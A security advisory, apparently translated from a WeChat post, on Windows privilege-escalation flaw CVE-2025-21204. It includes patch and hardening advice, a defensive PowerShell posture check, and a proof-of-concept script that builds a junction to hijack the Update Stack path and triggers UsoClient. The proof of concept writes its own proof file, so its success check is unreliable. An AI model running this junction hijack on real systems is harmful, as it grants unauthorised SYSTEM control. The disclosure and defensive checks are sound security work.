A high-severity local privilege escalation vulnerability, CVE-2025-21204, has recently been disclosed in Microsoft Windows. An attacker can exploit it through a simple symbolic-link attack to obtain the highest system privileges (SYSTEM) without authorization, threatening user data and potentially taking control of the entire operating system. The vulnerability details and protection guide follow:
I. Core impact: low barrier to privilege escalation, severe consequences
Attack principle
The vulnerability lies in Windows Update components (such as MoUsoCoreWorker.exe and UsoClient.exe). Because the system trusts the path C:\ProgramData\Microsoft\UpdateStack\Tasks by default, an attacker can create a symbolic link (junction) that redirects this path to a user-controlled directory and plant a malicious script there. When the system runs an update task, the SYSTEM-privileged process loads the malicious file, giving the attacker full control of the system.
Very low attack barrier
An attacker needs only ordinary user privileges to exploit the vulnerability; no complex technique or physical access to the device is required. By triggering a Windows Update task (such as a scheduled scan), privilege escalation can be achieved within 30 seconds.
Potential risks
- Theft of sensitive data (such as passwords and encryption certificates)
- Installation of hidden backdoors or ransomware
- Tampering with system configuration, undermining stability
II. Scope of impact: mainstream Windows versions
Affected systems: Windows 10 (21H2 and later), Windows 11 (all versions), Windows Server 2022
Fix status: Microsoft released patches in April 2025 (KB5055518, KB5055523, and others), but a large number of users have not yet updated.
III. Emergency protective measures: three steps to break the attack chain
1. Install the system patch immediately
Open Windows Settings, go to "Update & Security", and manually install the April 2025 cumulative update (search for KB5055518 or KB5055523).
Note: do not delete the system's inetpub folder, or the patch may be rendered ineffective.
2. Monitor for abnormal behaviour
Enable enterprise EDR/XDR tools, focusing on abnormal activity involving clfs.sys and the UpdateStack directory.
Ordinary users can use Task Manager to watch for an abnormal launch frequency of MoUsoCoreWorker.exe and UsoClient.exe.
3. Principle of least privilege
Restrict local administrator rights for ordinary users so that attackers cannot easily plant malicious files.
Regularly audit system directory permissions to ensure that critical paths (such as ProgramData) cannot be written to by unauthorized users.
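The following posture check is an added example, not part of the original article: it verifies the three measures above on one host by confirming that the April 2025 patch is installed, that the trusted Update Stack path is a real directory rather than a junction, and that no low-privilege principal holds write rights on it or its parent. It assumes Windows PowerShell 5.1 or later; the KB ids and trusted path come from the article, while the principal names and the `Target` property are standard Windows/PowerShell values.

```powershell
# Added posture check for CVE-2025-21204 mitigations (not from the original article).
# KB ids and the trusted path are taken from the article; principal names are Windows defaults.
$updateStackPath = 'C:\ProgramData\Microsoft\UpdateStack\Tasks'
$patchIds        = @('KB5055518', 'KB5055523')
$weakPrincipals  = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')

function Test-Cve202521204Posture {
    $findings = @()

    # Step 1: patch state. Get-HotFix lists installed updates by KB id.
    if (-not (Get-HotFix -Id $patchIds -ErrorAction SilentlyContinue)) {
        $findings += 'April 2025 cumulative update (KB5055518 / KB5055523) is not installed'
    }

    # Step 2: hijack indicator. The trusted path must be a real directory, not a
    # reparse point (junction or symlink) that redirects SYSTEM into a user-controlled tree.
    if (Test-Path -LiteralPath $updateStackPath) {
        $item = Get-Item -LiteralPath $updateStackPath -Force
        if (($item.Attributes -band [IO.FileAttributes]::ReparsePoint) -ne 0) {
            $findings += "$updateStackPath is a reparse point pointing to: $($item.Target)"
        }
    }

    # Step 3: least privilege. Report Allow ACEs that let low-privilege principals
    # create or write files in the trusted path or its parent directory.
    $writeMask = [Security.AccessControl.FileSystemRights]::Write -bor
                 [Security.AccessControl.FileSystemRights]::CreateFiles -bor
                 [Security.AccessControl.FileSystemRights]::CreateDirectories
    foreach ($dir in @($updateStackPath, (Split-Path $updateStackPath))) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $dir).Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                $weakPrincipals -contains $ace.IdentityReference.Value -and
                ($ace.FileSystemRights -band $writeMask) -ne 0) {
                $findings += "$dir grants $($ace.FileSystemRights) to $($ace.IdentityReference.Value)"
            }
        }
    }
    return $findings
}

$result = Test-Cve202521204Posture
if ($result) { $result | ForEach-Object { Write-Warning $_ } }
else { Write-Host '[+] No CVE-2025-21204 exposure indicators found on this host.' }
```

Run it from an elevated session; on a default installation the ProgramData ACL lets Users create folders beneath it, so any write-right finding should be reviewed against the hardening advice above rather than changed blindly.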
4. Local reproduction
This script simulates, via junction-based path hijacking, how a non-administrator user exploits the vulnerability to obtain SYSTEM privileges. It runs in three stages:
- Preparation
  - Create a trap directory ($trapPath) that imitates the system-trusted update path C:\ProgramData\Microsoft\UpdateStack\Tasks
  - Generate a malicious DLL file (UpdateStackAgent.dll) in a user-controlled directory, containing code that writes a verification log once privilege escalation is triggered
- Path hijack
  - Use the mklink /J command to create a junction that redirects the original system path to the trap directory
  - Trigger the Windows Update orchestrator (UsoClient.exe StartScan) to induce the SYSTEM process MoUsoCoreWorker.exe to load the malicious DLL
- Verification
  - Monitor whether the system process executes the payload and generates the verification file (cve2025-proof.log)
  - Record the attack logs ($verboseLog and evidence.txt) and report whether the exploit succeeded

Local test script:

```powershell
<#
.SYNOPSIS
    CVE-2025-21204 exploit simulation for non-admin users via junction-based path hijack.
.DESCRIPTION
    Drops a bait payload in a user-controlled directory, creates a junction to hijack the
    Update Stack path, and triggers the update process to test if SYSTEM accesses the payload.
    The script provides the PoC that allows running these actions.
.AUTHOR
    Elli Shlomo
#>

# Paths
$trapPath            = "$env:APPDATA\Microsoft\UpdateStack\Tasks"
$updateStackRealPath = "C:\ProgramData\Microsoft\UpdateStack\Tasks"
$payloadPath         = "$trapPath\UpdateStackAgent.dll"
$proofPath           = "C:\Users\Public\cve2025-proof.log"
$logPath             = "$env:APPDATA\CVE2025\simulation.log"
$evidencePath        = "$env:APPDATA\CVE2025\evidence.txt"
$verdictPath         = "$env:APPDATA\CVE2025\vulnerable.txt"
$verboseLog          = "$env:TEMP\cve2025-verbose.log"

# Intro
Write-Host "`n[*] CVE-2025-21204 Exploit Simulation (Non-Admin)"
Write-Host "[*] Trap directory     : $trapPath"
Write-Host "[*] Payload DLL path   : $payloadPath"
Write-Host "[*] SYSTEM proof file  : $proofPath"
Write-Host "[*] Simulation log     : $logPath"
Write-Host "[*] Evidence file      : $evidencePath"
Write-Host "[*] Verdict result     : $verdictPath"
Write-Host "[*] Verbose transcript : $verboseLog`n"

# Start transcript
Start-Transcript -Path $verboseLog -Force

# Ensure directories exist
Write-Host "[*] Creating necessary directories..."
New-Item -Path $trapPath -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
New-Item -Path (Split-Path $logPath) -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
Write-Host "[+] Directories ready.`n"

# Payload content
$payload = @"
Payload executed by SYSTEM at: $(Get-Date)
"@

# Write bait payload
Write-Host "[*] Writing payload to: $payloadPath"
$payload | Out-File -FilePath $payloadPath -Encoding ASCII
# Note: the script itself also writes $proofPath here, so the Test-Path check further
# down cannot by itself prove that SYSTEM touched the payload; the file owner and
# timestamp recorded in the evidence file are the meaningful indicators.
$payload | Out-File -FilePath $proofPath -Append
Write-Host "[+] Payload written.`n"

# Simulation metadata log
$log = @"
CVE-2025-21204 Exploit Simulation
-------------------------------------
Date         : $(Get-Date)
Payload File : $payloadPath
Hijack Path  : $updateStackRealPath
Proof File   : $proofPath
"@
Set-Content -Path $logPath -Value $log -Encoding UTF8 -Force
Write-Host "[+] Simulation metadata saved.`n"

# Attempt junction creation (non-admin safe)
Write-Host "[*] Attempting junction (no admin)..."
if (-not (Test-Path $updateStackRealPath)) {
    try {
        Start-Process -FilePath "cmd.exe" -ArgumentList "/c mklink /J `"$updateStackRealPath`" `"$trapPath`"" -NoNewWindow -Wait
        Write-Host "[+] Junction created: $updateStackRealPath → $trapPath"
    } catch {
        Write-Host "[-] Failed to create junction: $_"
    }
} else {
    Write-Host "[!] Target path already exists: $updateStackRealPath"
    Write-Host "[-] Cannot create junction unless folder is removed by SYSTEM update cleanup."
}
Write-Host ""

# Trigger update
Write-Host "[*] Triggering UsoClient.exe (StartScan)..."
try {
    Start-Process UsoClient.exe -ArgumentList StartScan -WindowStyle Hidden
    Write-Host "[+] UsoClient.exe started.`n"
} catch {
    Write-Host "[-] Failed to trigger UsoClient.exe: $_"
}

# Monitor for SYSTEM process
Write-Host "[*] Monitoring for SYSTEM process MoUsoCoreWorker.exe..."
$found = $false
for ($i = 1; $i -le 6; $i++) {
    Start-Sleep -Seconds 5
    Write-Host "[=] Attempt ${i}: Checking..."
    if (Get-Process -Name "MoUsoCoreWorker" -ErrorAction SilentlyContinue) {
        Write-Host "[!] SYSTEM process detected: MoUsoCoreWorker.exe"
        $found = $true
        break
    }
}
Start-Sleep -Seconds 5

# Check for success
Write-Host "`n[*] Analyzing payload execution..."
if (Test-Path $proofPath) {
    $owner     = (Get-Acl $proofPath).Owner
    $timestamp = (Get-Item $proofPath).LastWriteTime
    $details = @"
[+] Exploit successful
Payload executed as: $owner
Last Modified: $timestamp
"@
    Set-Content -Path $verdictPath -Value $true
    Write-Host "[✓] SUCCESS: SYSTEM likely accessed the payload."
} else {
    $details = @"
[!] Exploit failed
No proof file found.
Time: $(Get-Date)
"@
    Set-Content -Path $verdictPath -Value $false
    Write-Host "[✗] FAILURE: Payload was not executed by SYSTEM."
}

# Save evidence
Set-Content -Path $evidencePath -Value $details -Encoding UTF8
Write-Host "[*] Forensic evidence saved: $evidencePath"

# End
Stop-Transcript
Write-Host "`n[✓] Simulation complete. See verbose log: $verboseLog`n"
```
Originally published on the WeChat official account Z0安全: "High-severity Windows privilege escalation vulnerability CVE-2025-21204 disclosed; tens of millions of users must patch immediately"